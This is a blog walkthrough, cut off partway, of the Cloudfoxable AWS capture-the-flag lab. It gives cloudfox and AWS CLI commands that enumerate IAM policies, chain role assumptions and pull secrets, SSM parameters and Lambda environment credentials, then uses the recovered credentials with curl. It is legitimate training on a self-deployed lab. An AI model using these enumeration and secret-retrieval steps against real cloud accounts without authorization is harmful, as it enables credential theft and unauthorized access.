<!doctype html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7"><meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"><meta name="viewport" content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover" ><meta name="generator" content="Jekyll v4.3.3" /><meta property="og:title" content="Cloudfoxable" /><meta property="og:locale" content="en" /><meta name="description" content="Checkout the challenges over at GitHub." /><meta property="og:description" content="Checkout the challenges over at GitHub." /><link rel="canonical" href="https://tanishq.page/blog/posts/cloudfoxable/" /><meta property="og:url" content="https://tanishq.page/blog/posts/cloudfoxable/" /><meta property="og:site_name" content="Tanishq Rupaal" /><meta property="og:image" content="https://tanishq.page/blog/assets/img/covers/cloudfoxable-cover.jpeg" /><meta property="og:image:alt" content="Cloudfoxable Artwork" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2023-06-25T18:22:00-04:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://tanishq.page/blog/assets/img/covers/cloudfoxable-cover.jpeg" /><meta name="twitter:image:alt" content="Cloudfoxable Artwork" /><meta property="twitter:title" content="Cloudfoxable" /><meta name="twitter:site" content="@etheriosking" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2023-06-25T18:22:00-04:00","datePublished":"2023-06-25T18:22:00-04:00","description":"Checkout the challenges over at GitHub.","headline":"Cloudfoxable","image":{"alt":"Cloudfoxable Artwork","url":"https://tanishq.page/blog/assets/img/covers/cloudfoxable-cover.jpeg","@type":"imageObject"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://tanishq.page/blog/posts/cloudfoxable/"},"url":"https://tanishq.page/blog/posts/cloudfoxable/"}</script><title>Cloudfoxable | Tanishq Rupaal</title><link rel="apple-touch-icon" sizes="180x180" href="/blog/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/blog/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/blog/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/blog/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/blog/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Tanishq Rupaal"><meta name="application-name" content="Tanishq Rupaal"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/blog/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="/blog/assets/css/jekyll-theme-chirpy.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.2/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.27.20/dist/tocbot.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css"> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return 'mode'; } static get MODE_ATTR() { return 'data-mode'; } static get DARK_MODE() { return 'dark'; } static get LIGHT_MODE() { return 'light'; } static get ID() { return 'mode-toggle'; } constructor() { let self = this;this.sysDarkPrefers.addEventListener('change', () => { if (self.hasMode) { self.clearMode(); } self.notify(); }); if (!this.hasMode) { return; } if (this.isDarkMode) { this.setDark(); } else { this.setLight(); } } get sysDarkPrefers() { return window.matchMedia('(prefers-color-scheme: dark)'); } get isPreferDark() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); }get modeStatus() { if (this.hasMode) { return this.mode; } else { return this.isPreferDark ? ModeToggle.DARK_MODE : ModeToggle.LIGHT_MODE; } } setDark() { document.documentElement.setAttribute(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { document.documentElement.setAttribute(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { document.documentElement.removeAttribute(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); }notify() { window.postMessage( { direction: ModeToggle.ID, message: this.modeStatus }, '*' ); } flipMode() { if (this.hasMode) { this.clearMode(); } else { if (this.isPreferDark) { this.setLight(); } else { this.setDark(); } } this.notify(); } } const modeToggle = new ModeToggle(); </script><body><aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end"><header class="profile-wrapper"> <a href="/blog/" id="avatar" class="rounded-circle"><img src="/blog/assets/Abstract.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a><h1 class="site-title"> <a href="/blog/">Tanishq Rupaal</a></h1><p class="site-subtitle fst-italic mb-0">Cybersecurity Professional</p></header><nav class="flex-column flex-grow-1 w-100 ps-0"><ul class="nav"><li class="nav-item"> <a href="/blog/" class="nav-link"> <i class="fa-fw fas fa-home"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/blog/categories/" class="nav-link"> <i class="fa-fw fas fa-stream"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/blog/archives/" class="nav-link"> <i class="fa-fw fas fa-archive"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/blog/tags/" class="nav-link"> <i class="fa-fw fas fa-tag"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/blog/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle"></i> <span>ABOUT</span> </a></ul></nav><div class="sidebar-bottom d-flex flex-wrap align-items-center w-100"> <button type="button" class="btn btn-link nav-link" aria-label="Switch Mode" id="mode-toggle"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/tanq16" aria-label="github" target="_blank" rel="noopener noreferrer" > <i class="fab fa-github"></i> </a> <a href="https://twitter.com/etheriosking" aria-label="twitter" target="_blank" rel="noopener noreferrer" > <i class="fab fa-twitter"></i> </a> <a href="javascript:location.href = 'mailto:' + ['dragonking47','proton.me'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="https://linkedin.com/in/tanishqrupaal" aria-label="linkedin" target="_blank" rel="noopener noreferrer" > <i class="fab fa-linkedin"></i> </a></div></aside><div id="main-wrapper" class="d-flex justify-content-center"><div class="container d-flex flex-column px-xxl-5"><header id="topbar-wrapper" aria-label="Top Bar"><div id="topbar" class="d-flex align-items-center justify-content-between px-lg-3 h-100" ><nav id="breadcrumb" aria-label="Breadcrumb"> <span> <a href="/blog/">Home</a> </span> <span>Cloudfoxable</span></nav><button type="button" id="sidebar-trigger" class="btn btn-link"> <i class="fas fa-bars fa-fw"></i> </button><div id="topbar-title"> Post</div><button type="button" id="search-trigger" class="btn btn-link"> <i class="fas fa-search fa-fw"></i> </button> <search id="search" class="align-items-center ms-3 ms-lg-0"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..." > </search> <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button></div></header><div class="row flex-grow-1"><main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4"><article class="px-1"><header><h1 data-toc-skip>Cloudfoxable</h1><div class="post-meta text-muted"> <span> Posted <time data-ts="1687731720" data-df="ll" data-bs-toggle="tooltip" data-bs-placement="bottom" > Jun 25, 2023 </time> </span><div class="mt-3 mb-3"> <a href="/blog/assets/img/covers/cloudfoxable-cover.jpeg" class="popup img-link preview-img shimmer"><img src="/blog/assets/img/covers/cloudfoxable-cover.jpeg" alt="Cloudfoxable Artwork" width="1200" height="630" loading="lazy"></a><figcaption class="text-center pt-2 pb-2">Cloudfoxable Artwork</figcaption></div><div class="d-flex justify-content-between"> <span> By <em> <a href="https://twitter.com/etheriosking">Tanishq Rupaal</a> </em> </span><div> <span class="readtime" data-bs-toggle="tooltip" data-bs-placement="bottom" title="4040 words" > <em>22 min</em> read</span></div></div></div></header><div class="content"><p>Checkout the challenges over at <a href="https://github.com/BishopFox/cloudfoxable">GitHub</a>.</p><h2 id="setup--first-flag"><span class="me-2">Setup &amp; First Flag</span><a href="#setup--first-flag" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>My initial setup starts with getting into my <a href="https://github.com/tanq16/containerized-security-toolkit">containerized security toolkit</a>. From there, set up a sandbox account in the default organization (<code class="language-plaintext highlighter-rouge">security-testing</code>) with access keys of a user with admin privileges. Then, the following in serial order →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>awsn sts get-caller-identity <span class="c"># check user access keys</span>
<span class="nb">cd</span> /persist
git clone https://github.com/BishopFox/cloudfoxable <span class="o">&amp;&amp;</span> <span class="nb">cd </span>cloudfoxable
<span class="nb">cp </span>terraform.tfvars.example terraform.tfvars <span class="c"># basic setup from cloudfoxable instructions</span>

<span class="c"># setup</span>
terraform init
terraform apply
</pre></table></code></div></div><p>That gives <code class="language-plaintext highlighter-rouge">terraform</code>’s output with a command to set up a starting user and the first flag in step 3. The command that needs to be executed is the following →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s2">""</span> <span class="o">&gt;&gt;</span> ~/.aws/credentials <span class="o">&amp;&amp;</span> <span class="nb">echo</span> <span class="s2">"[cloudfoxable]"</span> <span class="o">&gt;&gt;</span> ~/.aws/credentials <span class="o">&amp;&amp;</span> <span class="nb">echo</span> <span class="s2">"aws_access_key_id = </span><span class="sb">`</span>terraform output <span class="nt">-raw</span> CTF_Start_User_Access_Key_Id<span class="sb">`</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> ~/.aws/credentials <span class="o">&amp;&amp;</span> <span class="nb">echo</span> <span class="s2">"aws_secret_access_key = </span><span class="sb">`</span>terraform output <span class="nt">-raw</span> CTF_Start_User_Secret_Access_Key<span class="sb">`</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> ~/.aws/credentials <span class="o">&amp;&amp;</span> <span class="nb">echo</span> <span class="s2">"region = us-west-2"</span> <span class="o">&gt;&gt;</span> ~/.aws/credentials
</pre></table></code></div></div><p>No flags are printed in the walkthrough since the correct value can be checked from the <code class="language-plaintext highlighter-rouge">main.tf</code> file with the following →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">grep</span> <span class="nt">-hiroE</span> <span class="s2">"FLAG</span><span class="se">\{</span><span class="s2">[^</span><span class="se">\{\}</span><span class="s2">]+?</span><span class="se">\}</span><span class="s2">"</span> <span class="nb">.</span> | <span class="nb">sort</span> <span class="nt">-u</span>
</pre></table></code></div></div><blockquote class="prompt-info"><p>Any <code class="language-plaintext highlighter-rouge">aws</code> command used as <code class="language-plaintext highlighter-rouge">awsn</code> is aliased to <code class="language-plaintext highlighter-rouge">aws --no-cli-pager</code>.</p></blockquote><h2 id="its-a-secret"><span class="me-2">It’s a secret</span><a href="#its-a-secret" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>With <code class="language-plaintext highlighter-rouge">cloudfox</code>, the following commands solve the challenge →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>cloudfox aws secrets <span class="nt">-p</span> cloudfoxable <span class="c"># lists where it stored analysis and loot</span>
bat ~/.cloudfox/cloudfox-output/aws/&lt;ACCID&gt;-cloudfoxable/table/secrets.txt <span class="c"># list accessible secrets</span>
bat ~/.cloudfox/cloudfox-output/aws/&lt;ACCID&gt;-cloudfoxable/loot/pull-secrets-commands.txt <span class="c"># list commands</span>
awsn <span class="nt">--profile</span> cloudfoxable <span class="nt">--region</span> us-west-2 ssm get-parameter <span class="nt">--with-decryption</span> <span class="nt">--name</span> /cloudfox/flag/its-a-secret
</pre></table></code></div></div><p>Without <code class="language-plaintext highlighter-rouge">cloudfox</code>, generic analysis can be done as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>awsn iam list-attached-user-policies <span class="nt">--user-name</span> ctf-starting-user <span class="nt">--profile</span> cloudfoxable
awsn iam get-policy <span class="nt">--policy-arn</span> <span class="s2">"arn:aws:iam::&lt;ACCID&gt;:policy/its-a-secret-policy"</span> <span class="nt">--profile</span> cloudfoxable
awsn iam get-policy-version <span class="nt">--version-id</span> v1 <span class="nt">--policy-arn</span> <span class="s2">"arn:aws:iam::&lt;ACCID&gt;:policy/its-a-secret-policy"</span> <span class="nt">--profile</span> cloudfoxable
awsn <span class="nt">--region</span> us-west-2 ssm get-parameter <span class="nt">--with-decryption</span> <span class="nt">--name</span> /cloudfox/flag/its-a-secret <span class="nt">--profile</span> cloudfoxable
</pre></table></code></div></div><h2 id="its-another-secret"><span class="me-2">It’s another secret</span><a href="#its-another-secret" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>The challenge asks us to assume the role <code class="language-plaintext highlighter-rouge">Ertz</code>, which can be setup with the following command →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="nb">cat</span> <span class="o">&lt;&lt;</span><span class="no">EOF</span><span class="sh"> &gt;&gt; ~/.aws/config
[profile ertz]
region = us-west-2
role_arn = arn:aws:iam::&lt;ACCID&gt;:role/Ertz
source_profile = cloudfoxable
</span><span class="no">EOF
</span></pre></table></code></div></div><p>The <code class="language-plaintext highlighter-rouge">ctf-starting-user</code> had the <em>SecurityAudit</em> policy attached, so it can be used for analysis. That provides insight that <code class="language-plaintext highlighter-rouge">Ertz</code> would be able to retrieve the SSM parameter in concern to get the flag →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>awsn iam list-attached-role-policies <span class="nt">--role-name</span> Ertz <span class="nt">--profile</span> cloudfoxable
awsn iam get-policy <span class="nt">--policy-arn</span> <span class="s2">"arn:aws:iam::&lt;ACCID&gt;:policy/its-another-secret-policy"</span> <span class="nt">--profile</span> cloudfoxable
awsn iam get-policy-version <span class="nt">--version-id</span> v1 <span class="nt">--policy-arn</span> <span class="s2">"arn:aws:iam::&lt;ACCID&gt;:policy/its-another-secret-policy"</span> <span class="nt">--profile</span> cloudfoxable
awsn <span class="nt">--region</span> us-west-2 ssm get-parameter <span class="nt">--with-decryption</span> <span class="nt">--name</span> /cloudfox/flag/its-another-secret <span class="nt">--profile</span> ertz
</pre></table></code></div></div><h2 id="backwards"><span class="me-2">Backwards</span><a href="#backwards" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge requires us to know that the ARN of interest is <code class="language-plaintext highlighter-rouge">arn:aws:secretsmanager:us-west-2:&lt;ACCID&gt;:secret:DomainAdministratorCredentials-SUFFIX</code>.</p><p>With <code class="language-plaintext highlighter-rouge">cloudfox</code>, the problem is super simple! First, the following gives the secrets available in the environment and the respective commands to retrieve them →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws secrets <span class="nt">-v3</span> <span class="nt">-p</span> cloudfoxable
</pre></table></code></div></div><p>The one that’s of concern here is related to the ARN the challenge is all about. With that command in hand, the next step is to figure out who has the permissions to retrieve that secret →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws permissions <span class="nt">-v2</span> <span class="nt">-p</span> cloudfoxable | <span class="nb">grep </span>secret
</pre></table></code></div></div><p>This tells us that the role <code class="language-plaintext highlighter-rouge">Alexander-Arnold</code> has the permissions to retrieve the secret we’re interested in. Finding who can assume this principal is also simple with the following →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws role-trusts <span class="nt">-v2</span> <span class="nt">-p</span> cloudfoxable
</pre></table></code></div></div><p>This shows that the <code class="language-plaintext highlighter-rouge">ctf-starting-user</code> has the permissions to assume <code class="language-plaintext highlighter-rouge">Alexander-Arnold</code>. Next, setting up a profile for this and assuming the role will allow listing the secret as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="nb">cat</span> <span class="o">&lt;&lt;</span><span class="no">EOF</span><span class="sh"> &gt;&gt; ~/.aws/config
[profile arnold]
region = us-west-2
role_arn = arn:aws:iam::&lt;ACCID&gt;:role/Alexander-Arnold
source_profile = cloudfoxable
</span><span class="no">EOF

</span>awsn secretsmanager get-secret-value <span class="nt">--secret-id</span> DomainAdministratorCredentials <span class="nt">--region</span> us-west-2 <span class="nt">--profile</span> arnold
</pre></table></code></div></div><p>Without <code class="language-plaintext highlighter-rouge">cloudfox</code>, what’s happening in the background is something that can be explored manually with a little more effort. This is a good point to begin with gaad-analysis →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>awsn iam get-account-authorization-details <span class="nt">--profile</span> cloudfoxable <span class="o">&gt;</span> cloudfoxable-gaad.json
</pre></table></code></div></div><p>This IAM dump contains everything in an AWS environment except for resource-based policies and SCPs and is a great analysis tool. The approach is slightly different here - unlike with <code class="language-plaintext highlighter-rouge">cloudfox</code>, it makes more sense to go in the opposite direction. Of course, that means a ton of manual evaluation (hence tooling helps), but the evaluation experience is worth it to some extent. So, we start by listing all principals (roles) that <code class="language-plaintext highlighter-rouge">ctf-starting-user</code> can assume, then manually check the permissions for each to find something interesting, and then check the policies to verify who can interact with the resource we’re interested in. Of course, even the first step involves looking at whether a role explicitly trusts our principal, or if our principal has assume-role permissions and the role trusts the account root. But all that is abstracted from the following commands →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="nb">cat </span>cloudfoxable.json | jq <span class="s1">'.RoleDetailList[] | select(.AssumeRolePolicyDocument.Statement[].Principal=={"AWS":"arn:aws:iam::&lt;ACCID&gt;:user/ctf-starting-user"})'</span>
<span class="c"># this gives info on the roles and their attached policies, checking which shows Arnold with the appropriate policy</span>
<span class="nb">cat </span>cloudfoxable.json | jq <span class="s1">'.Policies[] | select(.PolicyName=="corporate-domain-admin-password-policy")'</span>
<span class="c"># shows that retrieving the secret is allowed</span>
</pre></table></code></div></div><p>Then the steps are the same as with <code class="language-plaintext highlighter-rouge">cloudfox</code>.</p><h2 id="needles"><span class="me-2">Needles</span><a href="#needles" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge gives the role <code class="language-plaintext highlighter-rouge">ramos</code> as the starting point i.e., it can be assumed by <code class="language-plaintext highlighter-rouge">ctf-starting-user</code>.</p><p>This challenge is straightforward where the task is to evaluate the permissions of the <code class="language-plaintext highlighter-rouge">ramos</code> role. First, the role is set up like before and the permissions are checked via the gaad as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nb">cat </span>cloudfoxable.json | jq <span class="s1">'.RoleDetailList[] | select(.RoleName=="arn:aws:iam::&lt;ACCID&gt;:role/ramos")'</span>
<span class="c"># shows a couple read only policies</span>
</pre></table></code></div></div><p>The most sensitive read-only policy out of the three seems related to CloudFormation because that’s where secrets could potentially lie. So, by listing out the stacks and the template of the available stacks, the next flag is obtained. The steps are as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>aws cloudformation describe-stacks <span class="nt">--profile</span> ramos <span class="nt">--region</span> us-west-2
aws cloudformation get-template <span class="nt">--stack-name</span> cloudformationStack <span class="nt">--profile</span> ramos <span class="nt">--region</span> us-west-2
</pre></table></code></div></div><h2 id="root"><span class="me-2">Root</span><a href="#root" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge uses the starting point as the role <code class="language-plaintext highlighter-rouge">Kent</code>, which needs to get the <code class="language-plaintext highlighter-rouge">root</code> flag in the SSM parameter store.</p><p>Now, no more differentiation between non-<code class="language-plaintext highlighter-rouge">cloudfox</code> and <code class="language-plaintext highlighter-rouge">cloudfox</code>-based methods. Let’s combine. Also, instead of working backward or forward, time to do both. After setting up the <code class="language-plaintext highlighter-rouge">Kent</code> role, the permissions of <code class="language-plaintext highlighter-rouge">Kent</code> are observed in policy <code class="language-plaintext highlighter-rouge">root-policy1</code> which allows it to <code class="language-plaintext highlighter-rouge">sts:AssumeRole</code> on <code class="language-plaintext highlighter-rouge">*</code>.</p><p>Permissions can also be checked via <code class="language-plaintext highlighter-rouge">cloudfox</code> using the following instead of relying on gaad-analysis &amp;rarr</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws permissions <span class="nt">--principal</span> Kent <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p>Next, get secrets and their respective AWS commands with <code class="language-plaintext highlighter-rouge">cloudfox</code> to keep an eye on the <code class="language-plaintext highlighter-rouge">root</code> parameter. With that in hand, search using <code class="language-plaintext highlighter-rouge">cloudfox</code> to get who can perform <code class="language-plaintext highlighter-rouge">ssm:GetParameter</code> &amp;rarr</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws permissions <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span> | <span class="nb">grep</span> <span class="s2">"ssm:GetParameter"</span>
</pre></table></code></div></div><p>This shows that role <code class="language-plaintext highlighter-rouge">Lasso</code> can get the <code class="language-plaintext highlighter-rouge">root</code> parameter via permissions in the <code class="language-plaintext highlighter-rouge">important-policy</code>. Also, <code class="language-plaintext highlighter-rouge">Lasso</code>’s trust policy establishes trust in the role <code class="language-plaintext highlighter-rouge">Beard</code>. Checking the details of <code class="language-plaintext highlighter-rouge">Beard</code>, it trusts the account root. This means all principals that have an assume-role permission can assume <code class="language-plaintext highlighter-rouge">Beard</code> i.e., <code class="language-plaintext highlighter-rouge">Kent</code> fits the bill. So, adding <code class="language-plaintext highlighter-rouge">Beard</code> as another role obtained via <code class="language-plaintext highlighter-rouge">Kent</code> and <code class="language-plaintext highlighter-rouge">Lasso</code> as one assumed via <code class="language-plaintext highlighter-rouge">Beard</code>, <code class="language-plaintext highlighter-rouge">Lasso</code> can be used to list the parameter and get the flag.</p><h2 id="furls-1--2"><span class="me-2">Furls 1 &amp; 2</span><a href="#furls-1--2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge starts with the <code class="language-plaintext highlighter-rouge">ctf-starting-user</code> and requires finding the Lambda function URL for the <code class="language-plaintext highlighter-rouge">furls1</code> function and then the flag. Then, for the next phase, no other information except that we are after a Lambda function.</p><p><code class="language-plaintext highlighter-rouge">cloudfox</code> allows searching for numerous endpoints for App Runner, API Gateway, Cloudfront, EKS, ELB, Lambda, RDS, Redshift, and a couple more. With the interest in Lambda function URLs, it’s easy to enumerate all interesting endpoints with the following →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws endpoints <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p>This gives the function URL for <code class="language-plaintext highlighter-rouge">furls1</code>, which can be called with <code class="language-plaintext highlighter-rouge">cURL</code> to retrieve the flag.</p><p>The result from the previous command lists out another function URL (and that’s the only one), so trying <code class="language-plaintext highlighter-rouge">cURL</code> on the <code class="language-plaintext highlighter-rouge">auth-me</code> function, it prompts to send a GET request with a username and password as parameters. Trying to list out the function in question shows the username and password variables within the environment. That can be sent via <code class="language-plaintext highlighter-rouge">cURL</code> →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>awsn lambda list-functions <span class="nt">--profile</span> cloudfoxable <span class="nt">--region</span> us-west-2 | jq <span class="s1">'.Functions[] | selectt(.FunctionName=="auth-me")'</span> <span class="c"># get variables from environment</span>
curl <span class="s2">"https://xxxxxx.lambda-url.us-west-2.on.aws/?username=admin&amp;password=NotSummer2023"</span>
